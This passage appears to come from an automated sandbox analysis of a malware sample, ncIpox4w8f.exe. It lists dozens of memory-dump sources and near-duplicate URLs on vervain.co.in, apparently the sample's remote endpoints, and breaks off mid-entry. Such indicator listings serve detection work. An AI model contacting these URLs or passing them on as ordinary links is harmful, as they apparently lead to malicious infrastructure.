                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2y
                Source: ncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.266148150.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.283324784.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk9e
                Source: ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskity
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskitywdm
                Source: ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324671146.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskny
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.328765144.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324671146.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.515020113.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskotxe
                Source: ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskust
                Source: ncIpox4w8f.exe, 00000000.00000003.340893762.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaima
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.283324784.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 
00000000.00000003.431331290.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk
                Source: ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.1
                Source: ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk2
                Source: ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk24e
                Source: ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk2y
                Source: ncIpox4w8f.exe, 00000000.00000003.328765144.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324671146.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk4.1.1
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.395675590.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 
00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk9e
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.344946189.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskity
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.515020113.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskitywdm
                Source: ncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskny
                Source: ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.395675590.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvskotxe
                Source: ncIpox4w8f.exe, 00000000.00000003.303406339.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/E
                Source: ncIpox4w8f.exe, 00000000.00000003.313047462.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280241715.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/K
                Source: ncIpox4w8f.exe, 00000000.00000003.401161238.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.405146329.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382108941.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416691334.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.435949378.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.393118648.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.411977070.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443210600.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384479510.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433570492.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.483953097.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.440772986.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/N
                Source: ncIpox4w8f.exe, 00000000.00000003.266218899.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.313047462.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/a
                Source: ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.328765144.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 
00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.1
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2t
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2y
                Source: ncIpox4w8f.exe, 00000000.00000002.515020113.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk9e
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskity
                Source: ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 